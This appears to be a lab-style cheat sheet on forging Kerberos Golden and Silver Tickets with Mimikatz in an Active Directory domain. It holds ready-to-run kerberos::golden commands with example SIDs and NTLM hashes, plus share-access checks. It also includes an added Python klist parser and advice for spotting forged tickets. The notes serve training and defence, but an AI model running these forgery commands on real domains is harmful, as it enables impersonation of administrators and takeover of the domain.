Golden Ticket
With the November 2021 security updates for Kerberos this attack method was patched, so if the Domain Controllers have this update a valid (existing) domain user must be used as the impersonated account.
To generate the Golden Ticket we need the NTLM hash of the KRBTGT account and the Domain SID.
# We can use this Command to find the Domain SID
Get-ADDomain
Once we recover the Domain SID we can load Mimikatz to generate the Golden Ticket.
:: [admin] - Username we want to impersonate.
:: [domain] - FQDN of the domain for which we want to generate the ticket.
:: [id] - User RID. By default, Mimikatz uses RID 500, which is the RID of the built-in Administrator account.
:: [sid] - SID of the domain for which we want to generate the ticket.
:: [krbtgt] - NTLM hash of the KRBTGT account.
:: [endin] - Ticket lifetime. By default, Mimikatz generates a ticket that is valid for 10 years; the default Kerberos policy in AD is 10 hours (600 minutes).
:: [renewmax] - Maximum ticket lifetime with renewal. By default, Mimikatz generates a ticket that is renewable for 10 years; the default Kerberos policy in AD is 7 days (10080 minutes).
:: [ptt] - Pass-the-ticket: tells Mimikatz to inject the ticket directly into the current session, so it is ready to be used.
kerberos::golden /admin:<Username> /domain:za.adobe.loc /id:500 /sid:<Domain SID> /krbtgt:<NTLM Hash of KRBTGT Account> /endin:600 /renewmax:10080 /ptt
:: Query Example
kerberos::golden /admin:ReallyNotALegitAccount /domain:za.adobe.loc /id:500 /sid:S-1-5-21-3885271727-2693558621-2658995185 /krbtgt:16f9af38fca3ada405386b3b57366082 /endin:600 /renewmax:10080 /ptt
We can verify that the Golden Ticket is working by running the dir and klist commands against the Domain Controller.
:: List Domain Controller Contents
dir \\PCDC.za.adobe.loc\c$\
:: Displays a list of currently Cached Kerberos Tickets
klist
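The lifetime figures above (600 and 10080 minutes) and the klist check also give the Blue Team a simple anomaly test: a cached TGT whose lifetime or renewal window exceeds domain policy, or one keyed from the NTLM hash (RC4) where AES is expected, deserves a closer look. The parser below is an added example, not part of the original notes or of Mimikatz; the klist output it reads is constructed, and the date format and policy limits are assumed to be the Windows defaults.

```python
import re
from datetime import datetime, timedelta

# Default AD Kerberos policy quoted above: TGT lifetime 600 min, renewal 10080 min.
MAX_LIFETIME, MAX_RENEWAL = timedelta(minutes=600), timedelta(minutes=10080)
# Constructed klist output (not a real capture): #0 is an ordinary TGT, #1 mimics a
# Golden Ticket forged with Mimikatz defaults (10-year lifetime, RC4 key from the NTLM hash).
SAMPLE_KLIST = """\
#0>     Client: jsmith @ ZA.ADOBE.LOC
        Server: krbtgt/ZA.ADOBE.LOC @ ZA.ADOBE.LOC
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Start Time: 6/1/2023 8:00:00 (local)
        End Time:   6/1/2023 18:00:00 (local)
        Renew Time: 6/8/2023 8:00:00 (local)

#1>     Client: ReallyNotALegitAccount @ za.adobe.loc
        Server: krbtgt/za.adobe.loc @ za.adobe.loc
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Start Time: 6/1/2023 8:00:00 (local)
        End Time:   5/30/2033 8:00:00 (local)
        Renew Time: 5/30/2033 8:00:00 (local)
"""
FIELD = re.compile(r"^\s*(Client|Server|KerbTicket Encryption Type|Start Time|End Time|Renew Time):\s*(.+?)\s*$")
def parse_klist(text):
    tickets = []  # one dict of fields per cached ticket
    for line in text.splitlines():
        if line.startswith("#"):  # "#N>" opens a new ticket block
            tickets.append({})
            line = line.split(">", 1)[1]
        m = FIELD.match(line)
        if m and tickets:
            tickets[-1][m.group(1)] = m.group(2)
    return tickets

def ticket_time(t, key):
    # klist prints "6/1/2023 8:00:00 (local)"; strip the "(local)" suffix before parsing.
    return datetime.strptime(t[key].split(" (")[0], "%m/%d/%Y %H:%M:%S")

def suspicious_tickets(text):
    findings = []  # (client, reasons) for every ticket worth investigating
    for t in parse_klist(text):
        start, reasons = ticket_time(t, "Start Time"), []
        if ticket_time(t, "End Time") - start > MAX_LIFETIME:
            reasons.append("lifetime exceeds 600 min policy")
        if ticket_time(t, "Renew Time") - start > MAX_RENEWAL:
            reasons.append("renewal exceeds 10080 min policy")
        if t["Server"].lower().startswith("krbtgt/") and "RC4" in t["KerbTicket Encryption Type"]:
            reasons.append("TGT encrypted with RC4 (NTLM-hash key)")
        if reasons: findings.append((t["Client"], reasons))
    return findings
```

Tickets forged with /endin:600 /renewmax:10080 as in the example above pass the lifetime checks, which is why the encryption type and, on the Domain Controller side, the absence of a matching TGT request (Event ID 4768) are the more reliable signals.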
Silver Ticket
Even if the Golden Ticket has an incredibly long lifetime, the Blue Team can still defend against it by simply rotating the KRBTGT password twice. Silver Tickets are less likely to be discovered and significantly harder to defend against, since the password of every machine account would have to be rotated.
We can use Mimikatz to generate a Silver Ticket.
:: [admin] - Username we want to impersonate.
:: [domain] - FQDN of the domain for which we want to generate the ticket.
:: [id] - User RID. By default, Mimikatz uses RID 500, which is the RID of the built-in Administrator account.
:: [sid] - SID of the domain for which we want to generate the ticket.
:: [target] - Hostname of the target server. It can be any domain-joined host.
:: [rc4] - NTLM hash of the machine account of our target.
:: [service] - The service we are requesting in our TGS (CIFS is a safe bet, since it allows file access).
:: [ptt] - Pass-the-ticket: tells Mimikatz to inject the ticket directly into the current session, so it is ready to be used.
kerberos::golden /admin:<Username> /domain:za.adobe.loc /id:500 /sid:<Domain SID> /target:<Hostname of Server being Targeted> /rc4:<NTLM Hash of Machine Account of Target> /service:cifs /ptt
:: Query Example
kerberos::golden /admin:ReallyNotALegitAccount /domain:za.adobe.loc /id:500 /sid:S-1-5-21-3885271727-2693558621-2658995185 /target:PCMC.za.adobe.loc /rc4:4b091b72ce2eefece6494ee0f1bb874a /service:cifs /ptt
We can verify that the Silver Ticket is working by running the dir and klist commands against the target machine, in this case PCMC.za.adobe.loc.
:: List Target Machine Contents
dir \\PCMC.za.adobe.loc\c$\
:: Displays a list of currently Cached Kerberos Tickets
klist